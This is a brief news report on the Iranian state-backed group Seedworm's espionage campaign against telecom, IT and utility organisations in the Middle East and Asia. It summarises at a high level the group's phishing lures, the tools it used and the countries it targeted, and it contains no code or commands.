Researchers claimed to have seen the Iranian-backed cybercriminal group Seedworm targeting telecommunication companies, IT providers, and utility firms located in selected countries in Asia and the Middle East. According to their investigations, these threat actors have targeted these institutions for the past six months.
The state-backed threat group is using a combination of malware, network utilities, and spear-phishing strategies to obstruct the supply chain and exfiltrate data from their targets.
The researchers examined an attack against a telecommunication company in the Middle East last August, where the culprits developed a service to spread an unidentified Windows Script File. In addition, the threat actors seem to have tried to infect other targets by targeting the telco company and connecting to the EWS of other organisations.
The cyber-espionage campaign was also discovered actively operating in multiple organisations in the United Arab Emirates, Saudi Arabia, Jordan, Pakistan, Thailand, Kuwait, Israel, and Laos with attack tools, land-tactics, social engineering, and malware.
Experts believe that Seedworm could initiate an attack on Asia and the Middle East by obtaining entry to networks using credentials-stealing and spear-phishing tactics.
Analysts monitored an alleged ScreenConnect setup MSI delivered in a zipped file coded as ‘Special discount program[.]zip,’ which arrived in a spear-phishing message for entry in one attack. They discovered two IP addresses utilised in the campaign that were connected to Seedworm operations, along with some tools like Password Dumper and SharpChisel.
They have later confirmed the disruption of supply chains since attackers attempted to target large organisations by mounting a supply-chain onslaught.
In a single attack against a utility industry in Laos, the malicious threat actors observed by researchers abusing a public-facing service gained entry. The first targeted unit was an IIS web server.
Also, the threat actors utilised a Powershell command to distribute compromised scripts and tools to the network and linked to a webmail server of a company in Thailand, along with IT servers of an independent firm.
The Seedworm group’s true objective might be gathering telecommunication-related information. For this reason, researchers are left with little evidence to examine how the actors abuse their targets. Experts suggest that companies should increase their defence mechanisms since it is the only way to stop actors from infiltrating their networks.
